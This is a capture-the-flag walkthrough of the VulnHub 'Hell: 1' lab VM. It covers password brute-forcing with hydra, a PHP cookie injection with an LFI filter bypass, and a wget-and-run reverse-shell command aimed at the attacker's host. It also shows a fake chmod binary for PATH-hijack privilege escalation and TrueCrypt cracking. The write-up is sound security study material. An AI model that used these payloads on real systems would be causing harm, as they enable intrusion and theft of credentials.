published on in writeup
tags: hell

Hell: 1 - Part 1

Hell is the latest installment of evil hosted on VulnHub, and is the devil child of Peleus. To say it’s a difficult and lengthy challenge will not prepare you for the torture…

This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts!

Nmap

[email protected]:~# nmap -n -p- -A 192.168.127.102
 
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f4:bb:f4:22:36:08:61:ef:74:2c:27:e0:b4:a2:69:d3 (DSA)
|   2048 0e:31:1d:cf:04:d0:63:fa:5c:76:f2:dc:22:1c:f1:7c (RSA)
|_  256 e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa (ECDSA)
80/tcp    open     http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/personal/ /super_secret_login_path_muhahaha/
|_http-title: Have fun!
111/tcp   open     rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35027/udp  status
|_  100024  1          40080/tcp  status
666/tcp   open     doom?
1337/tcp  filtered waste
40080/tcp open     status  1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35027/udp  status
|_  100024  1          40080/tcp  status
1 service unrecognized despite returning data.

Apache

Popping over to port 80 in a web browser, gives you a page with the following text:

Welcome to Hell
Our admin Jack is still busy coding up the site, but in the mean time - have a comic...
All credit goes to Cyanide and Happiness at explosm.net.
Hopefully by the end of the challenge you'll be experiencing one or the other of those things.
I wonder what's on the gateway to hell? (Port 666 obv)

Without going into too much detail, the service on port 666 seemed to be a dead end to me, so I continued to enumerate the Apache service.

There are two entries in robots.txt:

/personal/
/super_secret_login_path_muhahaha/

The personal directory contains a rather… disturbing show of affection for the founder of VulnHub (and all round good guy), g0tmi1k.

The super_secret directory contains a login page.

I tried a few combinations of admin/jack and g0tmi1k, but was unsuccessful. There is no SQLi that I was able to find either.

Peleus hints in the VulnHub description for the challenge that some techniques required to root this VM can be found on his own blog. He has a good post regarding wordlists, which includes using custom word mangling rules for john.

I used the information to create a new mangled password list based on g0tmi1k and ran it again through hydra. This time I got a hit.

[email protected]:~/hell# hydra 192.168.127.128 http-form-post "/super_secret_login_path_muhahaha/login.php:username=^USER^&password=^PASS^&mysubmit=Login:Failed" -l jack -P wordlist-mangled
 
[80][www-form] host: 192.168.127.128   login: jack   password: g0tmi1k69

Hmm… 69, this just gets weirder and weirder…
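
As an added illustration of the mangling step (my own code, not the author's list and not john's rule syntax), the following Python generator derives case, leet and digit-suffix variants from a seed word and prints one candidate per line, the format hydra's -P option expects. The rule set is a small assumed subset of what john's rules can do; the point is that the working password g0tmi1k69 is just the seed plus a two-digit suffix, which a mangler of this kind produces early.

```python
#!/usr/bin/env python3
"""Minimal word-mangling generator in the spirit of john's rules.

Added example: given a seed word (here the hint "g0tmi1k"), emit case,
leet and digit-suffix variants for a login brute-forcer. The rules below
are an illustrative subset, not john's actual syntax.
"""

import itertools

# Assumed substitution table and suffix list; extend to taste.
LEET = {'a': '4', 'e': '3', 'i': '1', 'o': '0', 's': '5', 't': '7'}
SUFFIXES = ['', '!', '1', '123']


def case_variants(word):
    """Lower, upper, capitalised and toggled-case forms of the word."""
    yield word.lower()
    yield word.upper()
    yield word.capitalize()
    yield word.swapcase()


def leet_variants(word):
    """The word as given, fully leet-substituted, and de-leeted."""
    yield word
    yield ''.join(LEET.get(c, c) for c in word)
    unleet = {v: k for k, v in LEET.items()}
    yield ''.join(unleet.get(c, c) for c in word)


def mangle(seed, digits=range(100)):
    """Return an ordered, de-duplicated list of candidates derived from seed.

    Order matters for a brute-forcer: the unmodified seed comes first, then
    each base form with plain suffixes, then the two-digit suffixes 00..99.
    """
    seen = set()
    out = []
    for base in case_variants(seed):
        for word in leet_variants(base):
            tails = itertools.chain(SUFFIXES, ('%02d' % d for d in digits))
            for tail in tails:
                cand = word + tail
                if cand not in seen:
                    seen.add(cand)
                    out.append(cand)
    return out


if __name__ == '__main__':
    # One candidate per line, ready to redirect into a wordlist for hydra -P.
    for cand in mangle('g0tmi1k'):
        print(cand)
```

Run it as `python3 mangle.py > wordlist-mangled` (file name assumed) and feed the result to hydra as above.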

On the other side of this login there are image links which take you to a bunch of different pages (some with amusing GIFs).

The Personal Folder links you to another login page.

When you try an incorrect login you get a countdown.

And when you reach 3 failed attempts, a large intruder alert message appears and you can no longer access any of the pages. You must clear your cookies to try again.

These two aspects are tracked with cookies: failcount=3; intruder=1;

There is also the Notes page, which appears to write any input to a file called note.txt. Inferring from the text on the page, we can assume it's being stored in /tmp/note.txt.

Believe me… I’m going somewhere with all this…

Carrying out some filename bruteforcing in the super_secret directory reveals that the HTML for the Intruder message is within a file called 1. So the intruder=1; cookie is actually including a file. You can verify this by modifying the cookie to name a different file, e.g. index.php.

Also, the failcount=; cookie is unsanitised, so you can modify this to be any value. Putting all this together, we have some handy PHP injection!

LFI, PHP Injection

First, I injected the following PHP code into /tmp/note.txt, via notes.php: <?php passthru($_COOKIE['failcount']); ?>.

This will take the input from the failcount cookie and execute it with the php passthru function.

I then refreshed panel.php and modified the cookies accordingly. Note that there is some filtering on the intruder cookie - it seems to remove instances of ../, which obviously made including /tmp/note.txt difficult as you can’t use absolute paths either. There are a couple of ways around this - mine was to do ..././. The filter removes the instance of ../ in the middle but the characters on either side just come together to form a new ../. The filtering does not loop which allows this to work. The same thing can be accomplished using ...// and so on…

So:

GET /super_secret_login_path_muhahaha/panel.php
Cookie: 1405281617=; failcount=id; intruder=..././..././..././tmp/note.txt; PHPSESSID=u01geguamj2jakpin0vlm2peb4
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
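
To make the filter bypass and the cookie injection concrete, here is an added Python model (not the VM's PHP source) of what panel.php evidently did with the two cookies, with a hardened version beside it. It assumes the include path was cleaned with a single, non-looping removal of ../ and that failcount was never checked to be a number; WEBROOT and the ALLOWED page names are assumptions.

```python
#!/usr/bin/env python3
"""Model of panel.php's cookie handling, with the fix beside it.

Added illustration, not the VM's PHP. It assumes the page stripped "../"
from the `intruder` cookie in a single pass and then included the result,
and that `failcount` reached code without being checked as a number.
"""

import os
import re

WEBROOT = '/var/www/super_secret_login_path_muhahaha'   # assumed document root
ALLOWED = {'1', 'index.php', 'panel.php', 'notes.php'}  # assumed include targets


def vulnerable_filter(path):
    """Single-pass strip of '../', as str_replace('../', '', $x) would do."""
    return path.replace('../', '')


def vulnerable_include(cookie):
    """What the page effectively included: the filtered cookie, unanchored."""
    return vulnerable_filter(cookie)


def hardened_include(cookie):
    """Allowlist the target and confirm it resolves under WEBROOT, else None."""
    if cookie not in ALLOWED:
        return None
    full = os.path.normpath(os.path.join(WEBROOT, cookie))
    # Defence in depth: even an allowlisted name must stay inside the root.
    if os.path.commonpath([WEBROOT, full]) != WEBROOT:
        return None
    return full


def parse_failcount(cookie):
    """Accept only a small non-negative integer; anything else is tampering."""
    if re.fullmatch(r'[0-9]{1,3}', cookie):
        return int(cookie)
    return None


def traversal_survives(payload):
    """True if the single-pass filter leaves a '../' behind (filter bypass)."""
    return '../' in vulnerable_filter(payload)


if __name__ == '__main__':
    # The intruder cookie from the request above, plus a second variant.
    for p in ('..././..././..././tmp/note.txt', '....//....//tmp/note.txt'):
        print(f'{p!r:40} -> included {vulnerable_include(p)!r}, '
              f'hardened: {hardened_include(p)}')
    for fc in ('3', 'id'):
        print(f'failcount={fc!r} -> {parse_failcount(fc)}')
```

Under a single-pass strip, ..././ collapses to ../ and so does ....//. The hardened version does not try to strip anything: it only accepts a known page name and checks that the normalised path stays under the web root, so there is nothing left to bypass, and failcount is rejected unless it is a plain small integer.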

I was then able to use this code execution to download and run a reverse shell generated with msfpayload, passing the command as the (URL-encoded) failcount cookie value:

wget%20http%3A%2F%2F192.168.127.127%2Fshell%20-O%20%2Ftmp%2Fshell%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fshell%20%26%26%20%2Ftmp%2Fshell

which decodes to:

wget http://192.168.127.127/shell -O /tmp/shell && chmod +x /tmp/shell && /tmp/shell

Jack

With shell access as www-data, I was able to read the login.php file in the super_secret directory.

// mysql_connect("127.0.0.1", "Jack", "zgcR6mU6pX") or die ("Server Error");
// I'll change this back once development is done. Got sick of typing my password.
mysql_connect("127.0.0.1", "www-data", "website") or die("Server Error");

You can log into the MySQL DB with the www-data credentials, but there’s nothing more to see. The commented out password can be used to SSH into Hell as Jack.

Within his home directory is a folder called g0tmi1k_pics containing yet more disturbing pictures, but there’s nothing hidden in the images as far as I can tell.

There is also a hidden directory called .pgp.

-rwx------ 1 jack jack   39 Jun 18 12:35 note
-rwx------ 1 jack jack 1802 Jun 18 12:20 pgp.priv
-rwx------ 1 jack jack  890 Jun 18 12:24 pgp.pub
 
[email protected]:~$ cat .pgp/note
The usual password as with everything.

After some enumeration I found the following file, a PGP encrypted email.

[email protected]:~$ file /var/mail/jack/received/message.eml
/var/mail/jack/received/message.eml: PGP message

Import the key, then decrypt the message.

[email protected]:~/.pgp$ gpg --import pgp.priv
[email protected]:~/.pgp$ gpg -d /var/mail/jack/received/message.eml 

You need a passphrase to unlock the secret key for
user: "jack @ cowlovers.com"
2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
 
Enter passphrase: g0tmi1k69
 
Ok Jack. I've created the account 'milk_4_life' as per your request. Please stop emailing me about this now or I'm going to talk to HR like we discussed.
 
The password is '4J0WWvL5nS'

milk_4_life

With SSH access as milk_4_life, some proper work begins.

Within his home directory is a binary file called game, which seems to be a small wrapper around /usr/bin/game.py. When you run the file, all you see is the message I'm Listening. Netstat or netcat are not installed, but there are some alternatives that can be used.

Using ss -lp, we can see that it’s listening on the loopback on port 1337 and we can use telnet to interact with it.

[email protected]:~$ telnet 127.0.0.1 1337
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Type 'START' to begin
 
da easy crew
No... START. S-T-A-R-T
 
START
Starting...
 
You have 30 seconds to get as many points as you can, beat the high score! (High Score: 133723)
 
Quick what's... 696 x 928?

There didn’t seem to be any vulnerabilities such as buffer overflows in the inputs, so let’s try and beat the game! This reminded me a little of Chuckles’ game of single syllables in Ultima VII… Every time you get a correct answer your score goes up, but it’s a pretty hefty score to beat in 30 seconds.

Realistically, the only way to win is to write an automated script. All that’s required is to read the input of each question, split it to obtain the two numbers, make the calculation and send the answer back (all on a loop), chuckles.py.

#!/usr/bin/env python3
 
import re
import socket
 
target = '127.0.0.1'
port = 1337
 
# Every question looks like "Quick what's... 696 x 928?"; grab both operands.
question = re.compile(rb"Quick what's\.\.\. (\d+) x (\d+)\?")
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)                       # "Type 'START' to begin"
s.send(b'START\n')
 
buf = b''
while True:
        data = s.recv(1024)
        if not data:               # server closed the connection
                break
        buf += data                # recv() may split or merge lines, so buffer
        m = question.search(buf)
        if not m:
                if b'Final Score' in buf:   # game over: print the result and stop
                        print(buf.decode(errors='replace'))
                        break
                continue           # banner text only, wait for a question
        buf = buf[m.end():]        # drop everything up to this question
        mul = int(m.group(1)) * int(m.group(2))
        print(m.group(0).decode(), mul)
        s.send(b'%d\n' % mul)
 
s.close()

[email protected]:~$ ./chuckles.py 
[...snip...]
Final Score: 397261
!*!*!*!*! Congratulations, new high score (397261) !*!*!*!*!
 
I hear the faint sound of chmodding.......

This implies that when you win the game, a file permission is changed. Unfortunately it’s not helpful enough to tell us which one. It’s logical to assume that because the owner of game is george, then any modification it makes must also be to a file owned by george.

[email protected]:~$ find / -user george 2>/dev/null 
/home/milk_4_life/game
/home/george
/usr/bin/game.py
/usr/bin/lesson101
/var/mail/george
/var/mail/george/signup.eml

---x--x--x 1 george george 6531 Jun 19 15:13 /usr/bin/lesson101          <-- before
---s--x--x 1 george george 6531 Jun 19 15:13 /usr/bin/lesson101          <-- after

My brief investigation into this binary showed that there may be a buffer overflow in the Name field (after you correctly guess the number in fewer than 3 guesses). However, I was able to gain access as george through a slightly different route. The game binary executes a chmod on lesson101, but on a hunch I hoped that the chmod path was not hardcoded in the binary (this was described as a bug in v1 of Hades).

I wrote a simple C program that runs /bin/sh, compiled it into a binary called chmod and placed it in /tmp. Then I put /tmp at the front of the PATH environment variable and played the game. When the game goes to chmod lesson101, the setuid binary resolves chmod through PATH, executes /tmp/chmod and gives you a shell as George.

chmod.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Stand-in for chmod: when the setuid game binary runs "chmod" via PATH,
 * this runs instead and hands us an interactive shell with euid=george.
 * (Calling setuid(geteuid()) first would also set the real uid, which
 * matters if /bin/sh is bash, since bash drops a mismatched euid.) */
int main(void)
{
        system("/bin/sh -i");
        return 0;
}
[email protected]:/tmp$ gcc chmod.c -o chmod
[email protected]:/tmp$ PATH=/tmp:$PATH
[email protected]:~$ ./game
 
I'm listening
$ id
uid=1002(milk_4_life) gid=1002(milk_4_life) euid=1000(george) groups=1000(george),1002(milk_4_life)
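
Rather than relying on a hunch, you can check whether a setuid binary shells out to chmod by a relative name before playing the game. The following Python is an added example (not part of the writeup) that pulls printable strings from a file, as strings(1) does, and flags any that begin with a bare program name followed by arguments, which is the signature of a system()/popen() call that depends on the caller's PATH. The sample bytes are constructed for illustration and the INTERESTING list is an assumed heuristic.

```python
#!/usr/bin/env python3
"""Flag embedded command strings that name a program without a full path.

Added example. A setuid program that does system("chmod u+s ...") resolves
"chmod" through the caller's PATH, which is what the /tmp/chmod trick
exploits. This scans a file's printable strings and reports any that start
with a bare program name followed by arguments.
"""

import re
import sys

# A "command-like" string: a bare word with no slash, then whitespace and an argument.
COMMAND_RE = re.compile(r'^([A-Za-z][\w.-]*)\s+\S')

# Assumed heuristic: programs worth flagging when a privileged process finds
# them via PATH. Extend as needed.
INTERESTING = {'chmod', 'chown', 'cp', 'mv', 'rm', 'sh', 'bash',
               'python', 'tar', 'cat', 'ls', 'id'}


def printable_strings(blob, minlen=4):
    """Runs of printable ASCII of at least minlen bytes, like strings(1)."""
    pattern = rb'[\x20-\x7e]{%d,}' % minlen
    return [m.group(0).decode('ascii') for m in re.finditer(pattern, blob)]


def relative_commands(blob):
    """Return (program, string) for each embedded command that relies on PATH.

    Strings starting with an absolute path ("/bin/chmod ...") are not
    reported: they cannot be hijacked by prepending a directory to PATH.
    """
    hits = []
    for s in printable_strings(blob):
        m = COMMAND_RE.match(s)
        if m and m.group(1) in INTERESTING:
            hits.append((m.group(1), s))
    return hits


# Constructed sample: a fake ELF header plus one PATH-dependent command
# string, one absolute-path command string and one ordinary message.
SAMPLE = (b'\x7fELF\x02\x01\x01' + b'\x00' * 9
          + b'chmod u+s /usr/bin/lesson101\x00'
          + b'/bin/chmod u+s /usr/bin/lesson101\x00'
          + b'I hear the faint sound of chmodding.......\x00')


if __name__ == '__main__':
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, 'rb').read() if path else SAMPLE
    for prog, s in relative_commands(blob):
        print(f'PATH-dependent call to {prog!r}: {s}')
```

Run it against the real binary with `python3 relcmd.py ~/game` (script name assumed); a hit on a bare `chmod ...` string is the green light for the PATH trick, while only `/bin/chmod ...` strings would mean the path is hardcoded and the trick will not work.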

George

This allows you to enter George’s home directory. To give myself persistent access, I created a .ssh directory and echoed my public SSH key into authorized_keys, which lets me SSH in as George without a password. George also has an email (readable even before this point) that contains an interesting reference to the rockyou wordlist.

-rw-r--r-- 1 george george 175 Jun 20 13:06 /var/mail/george/signup.eml
 
From: admin@rockyou.com

Within his home area is a file called container.tc.

-rw------- 1 george george 4194304 Jun 19 21:09 container.tc

The .tc extension indicates that this is a TrueCrypt container - this can be easily decrypted using the NSA backdoor (joke, but probably true :s). I transferred the container to my Windows host, where I have cudaHashcat working, and ran it against the rockyou wordlist using mode 6211 (TrueCrypt, PBKDF2-HMAC-RIPEMD160 with a 512-bit XTS key; hashcat only needs the encrypted volume header, the first 512 bytes of the file). The correct password was found in about 27 seconds.

cudaHashcat64.exe -m 6211 container.tc rockyou.txt
letsyouupdateyourfunnotesandmore

With this, the container can be decrypted and mounted.

[email protected]:~$ truecrypt container.tc
Enter mount directory [default]: /mnt/truecrypt
Enter password for /home/george/container.tc:
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:
 
[email protected]:~$ ls -l /mnt/truecrypt/
-rwx------ 1 george george 1679 Jul  5 20:01 id_rsa